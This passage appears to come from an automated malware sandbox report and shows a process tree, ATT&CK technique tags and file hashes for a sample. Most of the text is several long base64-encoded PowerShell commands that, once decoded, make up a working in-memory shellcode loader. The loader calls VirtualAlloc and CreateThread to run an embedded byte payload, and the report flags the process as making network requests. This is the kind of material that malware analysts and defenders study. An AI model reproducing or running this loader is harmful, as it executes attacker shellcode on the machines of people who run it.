LAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAUwBlAG8ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFMAZQBvACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAWgBqAE8ASQApACkAOwAkAFYAVQBiAG0AIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAcQBiAFgAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAcQBiAFgAIAAkAFYAVQBiAG0AIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAVgBVAGIAbQAgACQAZQAiADsAfQA='"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3836

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABaAGoATwBJACAAPQAgACcAJABvAHoAVAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABvAHoAVAAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGYALAAwAHgAZQBmACwAMAB4ADgAMwAsADAAeAA2ADMALAAwAHgANwA0ACwAMAB4AGQAZAAsADAAeABjADIALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAzADEALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADcAOAAsADAAeAAwAGUALAAwAHgAMAAzACwAMAB4ADkANwAsADAAeAA4AGQALAAwAHgAOAAxACwAMAB4ADgAMQAsADAAeAA5AGIALAAwAHgANwBhACwAMAB4AGMAYQAsADAAeAA2AGEALAAwAHgANgAzACwAMAB4ADcAYgAsADAAeABiADUALAAwAHgAZQAzACwAMAB4ADgANgAsADAAeAA0AGEALAAwAHgAZQA3ACwAMAB4ADkAMAAsADAAeABjADMALAAwAHgAZgBmACwAMAB4ADMANwAsADAAeABkADIALAAwAHgAOAAxACwAMAB4AGYAMwAsADAAeABiAGMALAAwAHgAYgA2ACwAMAB4ADMAMQAsADAAeAAzAGQALAAwAHgAMwBjACwAMAB4ADMAOQAsADAAeAA4AGUALAAwAHgANwA3ACwAMAB4AGUANAAsADAAeABjAGQALAAwAHgAOAAyACwAMAB4AGEAZgAsADAAeABkADkALAAwAHgAMQAxACwAMAB4AGMAZQAsADAAeAA4AGMALAAwAHgANwA4ACwAMAB4AGUAZQAsADAAeAAwAGMALAAwAHgAYwAxACwAMAB4ADUAYQAsADAAeABjAGYALAAwAHgAZABmACwAMAB4ADEANAAsADAAeAA5AGEALAAwAHgAMAA4ACwAMAB4ADkANgAsADAAeAA1ADMALAAwAHgANwAzACwAMAB4AGMANAAsADAAeAA3AGYALAAwAHgAMQA3ACwAMAB4AGQAOQAsADAAeABmADkALAAwAHgAZgA0ACwAMAB4ADYANQAsADAAeABlADIALAAwAHgAZgA4ACwAMAB4AGQAYQAsADAAeABlADEALAAwAHgANQBhACwAMAB4ADgAMwAsADAAeAA1AGYALAAwAHgAMwA1ACwAMAB4ADIAZQAsADAAeAAzAGYALAAwAHgANQBlACwAMAB4ADYANgAsADAAeAA0ADQALAAwAHgAZQA3ACwAMAB4ADQAMAAsADAAeAAwAGQALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeABkADAALAAwAHgAMQAwACwAMAB4ADcANwAsADAAeABiADUALAAwAHgAMQA5ACwAMAB4ADYANgAsADAAeAA0AGIALAAwAHgAZgBmACwAMAB4ADEAMgAsADAAeABiADMALAAwAHgAMwA4ACwAMAB4AGYAZQAsADAAeABmADIALAAwAHgAOABkACwAMAB4AGMAMQAsADAAeAAzADAALAAwAHgAMwBhACwAMAB4ADIAYwAsADAAeABmADIALAAwAHgAMwBlACwAMAB4ADEANgAsADAAeABhAGUALAAwAHgAYwBhACwAMAB4ADcAOQAsADAAeAA4ADYALAAwAHgAYwA0ACwAMAB4ADIAMAAsADAAeAA3AGEALAAwAHgAMwBiACwAMAB4AGQAZgAsADAAeABmADIALAAwAHgAMAAwACwAMAB4AGUANwAsADAAeAA2AGEALAAwAHgAZQA1ACwAMAB4AGEAMwAsADAAeAA2AGMALAAwAHgAYwBjACwAMAB4AGMAMQAsADAAeAA1ADIALAAwAHgAYQAxACwAMAB4ADgAYgAsADAAeAA4ADIALAAwAHgANQA5ACwAMAB4ADAAZQAsADAAeABkAGYALAAwAHgAYwBkACwAMAB4ADcAZAAsADAAeAA5ADEALAAwAHgAMABjACwAMAB4ADYANgAsADAAeAA3ADkALAAwAHgAMQBhACwAMAB4AGIAMwAsADAAeABhADkALAAwAHgAMABiACwAMAB4ADUAOAAsADAAeAA5ADAALAAwAHgANgBkACwAMAB4ADUANwAsADAAeAAzAGIALAAwAHgAYgA5ACwAMAB4ADMANAAsADAAeAAzAGQALAAwAHgAZQBhACwAMAB4AGMANgAsADAAeAAyADcALAAwAHgAOQA5ACwAMAB4ADUAMwAsADAAeAA2ADMALAAwAHgAMgAzACwAMAB4ADAAOAAsADAAeAA4ADIALAAwAHgAMQAzACwAMAB4AGMAYwAsADAAeABkADIALAAwAHgAYQBiACwAMAB4ADQAOQAsADAAeAA1AGIALAAwAHgAMQBlACwAMAB4ADYAMQAsADAAeAA3ADIALAAwAHgAOQBiACwAMAB4ADAAOAAsADAAeABmADIALAAwAHgAMAAxACwAMAB4AGEAOQAsADAAeAA5ADcALAAwAHgAYQA4ACwAMAB4ADgAZAAsADAAeAA4ADEALAAwAHgANQAwACwAMAB4ADcANgAsADAAeAA0ADkALAAwAHgAOQAzACwAMAB4ADcANwAsADAAeAA4ADkALAAwAHgAOAA1ACwAMAB4ADEAYgAsADAAeAAxADcALAAwAHgANwA0ACwAMAB4ADIANgAsADAAeAA1AGMALAAwAHgAMwAxACwAMAB4AGIAMgAsADAAeAA3ADIALAAwAHgAMABjACwAMAB4ADIAOQAsADAAeAAxADMALAAwAHgAZgBiACwAMAB4AGMANwAsADAAeABhADkALAAwAHgAOQBjACwAMAB4ADIAZQAsADAAeAA3AGQALAAwAHgAYQAwACwAMAB4ADAAYQAsADAAeAA0ADIALAAwAHgAMwBiACwAMAB4ADYAOQAsADAAeABkADkALAAwAHgAMABjACwAMAB4ADMAZQAsADAAeAA5ADIALAAwAHgANgA2ACwAMAB4ADIAYgAsADAAeABiADcALAAwAHgANwA0ACwAMAB4AGMAOAAsADAAeABlADQALAAwAHgAOQA4ACwAMAB4ADIAOAAsADAAeABhADgALAAwAHgANQA0ACwAMAB4ADUAOQAsADAAeAA5ADkALAAwAHgANAAwACwAMAB4AGIAZgAsADAAeAA1ADYALAAwAHgAYwA2ACwAMAB4ADcAMAAsADAAeABjADAALAAwAHgAYgBjACwAMAB4ADYAZgAsADAAeAAxAGEALAAwAHgAMgBmACwAMAB4ADYAOQAsADAAeABjADcALAAwAHgAYgAyACwAMAB4AGQANgAsADAAeAAzADAALAAwAHgAOQAzACwAMAB4ADIAMwAsADAAeAAxADYALAAwAHgAZQBmACwAMAB4AGQAOQAsADAAeAA2ADMALAAwAHgAOQBjACwAMAB4ADEAYwAsADAAeAAxAGQALAAwAHgAMgBkACwAMAB4ADUANQAsADAAeAA2ADgALAAwAHgAMABkACwAMAB4AGQAOQAsADAAeAA5ADUALAAwAHgAMgA3ACwAMAB4ADYAZgAsADAAeAA0AGYALAAwAHgAYQA5ACwAMAB4ADkAZAAsADAAeAAxAGEALAAwAHgANgBmACwAMAB4ADMAZgAsADAAeAAxAGEALAAwAHgAOABkACwAMAB4ADMAOAAsADAAeABkADcALAAwAHgAMgAwACwAMAB4AGUAOAAsADAAeAAwAGUALAAwAHgANwA4ACwAMAB4AGQAYQAsADAAeABkAGYALAAwAHgAMAA1ACwAMAB4AGIAMQAsADAAeAA0AGUALAAwAHgAYQAwACwAMAB4ADcAMQAsADAAeABiAGUALAAwAHgAOQBlACwAMAB4ADIAMAAsADAAeAA4ADEALAAwAHgAZQA4ACwAMAB4AGYANAAsADAAeAAyADAALAAwAHgAZQA5ACwAMAB4ADQAYwAsADAAeABhAGQALAAwAHgANwAyACwAMAB4ADAAYwAsADAAeAA5ADMALAAwAHgANwA4ACwAMAB4AGUANwAsADAAeAA5AGQALAAwAHgAMAA2ACwAMAB4ADgAMwAsADAAeAA1AGUALAAwAHgANwAyACwAMAB4ADgAMAAsADAAeABlAGIALAAwAHgANQBjACwAMAB4AGEAZAAsADAAeABlADYALAAwAHgAYgAzACwAMAB4ADkAZgAsADAAeAA5ADgALAAwAHgAZgA2ACwAMAB4ADgAOAAsADAAeAA0ADkALAAwAHgAZQA0ACwAMAB4ADgAYwAsADAAeABlADAALAAwAHgANAA5ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABTAGUAbwA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAUwBlAG8ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFMAZQBvACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAWgBqAE8ASQApACkAOwAkAFYAVQBiAG0AIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAcQBiAFgAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAcQBiAFgAIAAkAFYAVQBiAG0AIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAVgBVAGIAbQAgACQAZQAiADsAfQA=
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2688

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -ec JABvAHoAVAAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAG8AegBUACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZgAsADAAeABlAGYALAAwAHgAOAAzACwAMAB4ADYAMwAsADAAeAA3ADQALAAwAHgAZABkACwAMAB4AGMAMgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANwA4ACwAMAB4ADAAZQAsADAAeAAwADMALAAwAHgAOQA3ACwAMAB4ADgAZAAsADAAeAA4ADEALAAwAHgAOAAxACwAMAB4ADkAYgAsADAAeAA3AGEALAAwAHgAYwBhACwAMAB4ADYAYQAsADAAeAA2ADMALAAwAHgANwBiACwAMAB4AGIANQAsADAAeABlADMALAAwAHgAOAA2ACwAMAB4ADQAYQAsADAAeABlADcALAAwAHgAOQAwACwAMAB4AGMAMwAsADAAeABmAGYALAAwAHgAMwA3ACwAMAB4AGQAMgAsADAAeAA4ADEALAAwAHgAZgAzACwAMAB4AGIAYwAsADAAeABiADYALAAwAHgAMwAxACwAMAB4ADMAZAAsADAAeAAzAGMALAAwAHgAMwA5ACwAMAB4ADgAZQAsADAAeAA3ADcALAAwAHgAZQA0ACwAMAB4AGMAZAAsADAAeAA4ADIALAAwAHgAYQBmACwAMAB4AGQAOQAsADAAeAAxADEALAAwAHgAYwBlACwAMAB4ADgAYwAsADAAeAA3ADgALAAwAHgAZQBlACwAMAB4ADAAYwAsADAAeABjADEALAAwAHgANQBhACwAMAB4AGMAZgAsADAAeABkAGYALAAwAHgAMQA0ACwAMAB4ADkAYQAsADAAeAAwADgALAAwAHgAOQA2ACwAMAB4ADUAMwAsADAAeAA3ADMALAAwAHgAYwA0ACwAMAB4ADcAZgAsADAAeAAxADcALAAwAHgAZAA5ACwAMAB4AGYAOQAsADAAeABmADQALAAwAHgANgA1ACwAMAB4AGUAMgAsADAAeABmADgALAAwAHgAZABhACwAMAB4AGUAMQAsADAAeAA1AGEALAAwAHgAOAAzACwAMAB4ADUAZgAsADAAeAAzADUALAAwAHgAMgBlACwAMAB4ADMAZgAsADAAeAA1AGUALAAwAHgANgA2ACwAMAB4ADQANAAsADAAeABlADcALAAwAHgANAAwACwAMAB4ADAAZAAsADAAeAAxADMALAAwAHgAMAAwACwAMAB4AGQAMAAsADAAeAAxADAALAAwAHgANwA3ACwAMAB4AGIANQAsADAAeAAxADkALAAwAHgANgA2ACwAMAB4ADQAYgAsADAAeABmAGYALAAwAHgAMQAyACwAMAB4AGIAMwAsADAAeAAzADgALAAwAHgAZgBlACwAMAB4AGYAMgAsADAAeAA4AGQALAAwAHgAYwAxACwAMAB4ADMAMAAsADAAeAAzAGEALAAwAHgAMgBjACwAMAB4AGYAMgAsADAAeAAzAGUALAAwAHgAMQA2ACwAMAB4AGEAZQAsADAAeABjAGEALAAwAHgANwA5ACwAMAB4ADgANgAsADAAeABjADQALAAwAHgAMgAwACwAMAB4ADcAYQAsADAAeAAzAGIALAAwAHgAZABmACwAMAB4AGYAMgAsADAAeAAwADAALAAwAHgAZQA3ACwAMAB4ADYAYQAsADAAeABlADUALAAwAHgAYQAzACwAMAB4ADYAYwAsADAAeABjAGMALAAwAHgAYwAxACwAMAB4ADUAMgAsADAAeABhADEALAAwAHgAOABiACwAMAB4ADgAMgAsADAAeAA1ADkALAAwAHgAMABlACwAMAB4AGQAZgAsADAAeABjAGQALAAwAHgANwBkACwAMAB4ADkAMQAsADAAeAAwAGMALAAwAHgANgA2ACwAMAB4ADcAOQAsADAAeAAxAGEALAAwAHgAYgAzACwAMAB4AGEAOQAsADAAeAAwAGIALAAwAHgANQA4ACwAMAB4ADkAMAAsADAAeAA2AGQALAAwAHgANQA3ACwAMAB4ADMAYgAsADAAeABiADkALAAwAHgAMwA0ACwAMAB4ADMAZAAsADAAeABlAGEALAAwAHgAYwA2ACwAMAB4ADIANwAsADAAeAA5ADkALAAwAHgANQAzACwAMAB4ADYAMwAsADAAeAAyADMALAAwAHgAMAA4ACwAMAB4ADgAMgAsADAAeAAxADMALAAwAHgAYwBjACwAMAB4AGQAMgAsADAAeABhAGIALAAwAHgANAA5ACwAMAB4ADUAYgAsADAAeAAxAGUALAAwAHgANgAxACwAMAB4ADcAMgAsADAAeAA5AGIALAAwAHgAMAA4ACwAMAB4AGYAMgAsADAAeAAwADEALAAwAHgAYQA5ACwAMAB4ADkANwAsADAAeABhADgALAAwAHgAOABkACwAMAB4ADgAMQAsADAAeAA1ADAALAAwAHgANwA2ACwAMAB4ADQAOQAsADAAeAA5ADMALAAwAHgANwA3ACwAMAB4ADgAOQAsADAAeAA4ADUALAAwAHgAMQBiACwAMAB4ADEANwAsADAAeAA3ADQALAAwAHgAMgA2ACwAMAB4ADUAYwAsADAAeAAzADEALAAwAHgAYgAyACwAMAB4ADcAMgAsADAAeAAwAGMALAAwAHgAMgA5ACwAMAB4ADEAMwAsADAAeABmAGIALAAwAHgAYwA3ACwAMAB4AGEAOQAsADAAeAA5AGMALAAwAHgAMgBlACwAMAB4ADcAZAAsADAAeABhADAALAAwAHgAMABhACwAMAB4ADQAMgAsADAAeAAzAGIALAAwAHgANgA5ACwAMAB4AGQAOQAsADAAeAAwAGMALAAwAHgAMwBlACwAMAB4ADkAMgAsADAAeAA2ADYALAAwAHgAMgBiACwAMAB4AGIANwAsADAAeAA3ADQALAAwAHgAYwA4ACwAMAB4AGUANAAsADAAeAA5ADgALAAwAHgAMgA4ACwAMAB4AGEAOAAsADAAeAA1ADQALAAwAHgANQA5ACwAMAB4ADkAOQAsADAAeAA0ADAALAAwAHgAYgBmACwAMAB4ADUANgAsADAAeABjADYALAAwAHgANwAwACwAMAB4AGMAMAAsADAAeABiAGMALAAwAHgANgBmACwAMAB4ADEAYQAsADAAeAAyAGYALAAwAHgANgA5ACwAMAB4AGMANwAsADAAeABiADIALAAwAHgAZAA2ACwAMAB4ADMAMAAsADAAeAA5ADMALAAwAHgAMgAzACwAMAB4ADEANgAsADAAeABlAGYALAAwAHgAZAA5ACwAMAB4ADYAMwAsADAAeAA5AGMALAAwAHgAMQBjACwAMAB4ADEAZAAsADAAeAAyAGQALAAwAHgANQA1ACwAMAB4ADYAOAAsADAAeAAwAGQALAAwAHgAZAA5ACwAMAB4ADkANQAsADAAeAAyADcALAAwAHgANgBmACwAMAB4ADQAZgAsADAAeABhADkALAAwAHgAOQBkACwAMAB4ADEAYQAsADAAeAA2AGYALAAwAHgAMwBmACwAMAB4ADEAYQAsADAAeAA4AGQALAAwAHgAMwA4ACwAMAB4AGQANwAsADAAeAAyADAALAAwAHgAZQA4ACwAMAB4ADAAZQAsADAAeAA3ADgALAAwAHgAZABhACwAMAB4AGQAZgAsADAAeAAwADUALAAwAHgAYgAxACwAMAB4ADQAZQAsADAAeABhADAALAAwAHgANwAxACwAMAB4AGIAZQAsADAAeAA5AGUALAAwAHgAMgAwACwAMAB4ADgAMQAsADAAeABlADgALAAwAHgAZgA0ACwAMAB4ADIAMAAsADAAeABlADkALAAwAHgANABjACwAMAB4AGEAZAAsADAAeAA3ADIALAAwAHgAMABjACwAMAB4ADkAMwAsADAAeAA3ADgALAAwAHgAZQA3ACwAMAB4ADkAZAAsADAAeAAwADYALAAwAHgAOAAzACwAMAB4ADUAZQAsADAAeAA3ADIALAAwAHgAOAAwACwAMAB4AGUAYgAsADAAeAA1AGMALAAwAHgAYQBkACwAMAB4AGUANgAsADAAeABiADMALAAwAHgAOQBmACwAMAB4ADkAOAAsADAAeABmADYALAAwAHgAOAA4ACwAMAB4ADQAOQAsADAAeABlADQALAAwAHgAOABjACwAMAB4AGUAMAAsADAAeAA0ADkAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAFMAZQBvAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABTAGUAbwAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAUwBlAG8ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:5836

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ov4twx14\ov4twx14.cmdline"
5⤵
PID:2200

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8604.tmp" "c:\Users\Admin\AppData\Local\Temp\ov4twx14\CSCD112C82F36954465A218B2D199EA560.TMP"
6⤵
PID:1008

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
59951e42e1f8f27033f15d1b4bce3ebd

SHA1
8de71f347e6fce03218316e40de84c996c455299

SHA256
31d9ad4d8b3d0e1787c5ba83a85cf84fa34ed03616fadbd99e7abaed87546888

SHA512
7e9079f825eea4d2340a81a30e583ba4bdf268ea77b7405e91993e886af3260d9628ac44f9eb9c3e9abe066fbbec80572c7b09fe7e9ee9c4ec45ad7ea1d795c5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
7e3050a938f53836ff4b0126f80dc5a9

SHA1
0ba477d4304298a1c8be989b93b6f3d4b09db3e5

SHA256
025b31225dffecd916a448e6962108292a0ffbc447e4158614e9a477015b7586

SHA512
973759cad3f90687d02439b6c5e5e344ad45ae785f6ea40295bd4d819151f2b27f185e954b193ec87d64f056da13e2b4969019d64724e5ede06e549bd1034baa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
10d21d43dd029aae80f3d8bd28bb141f

SHA1
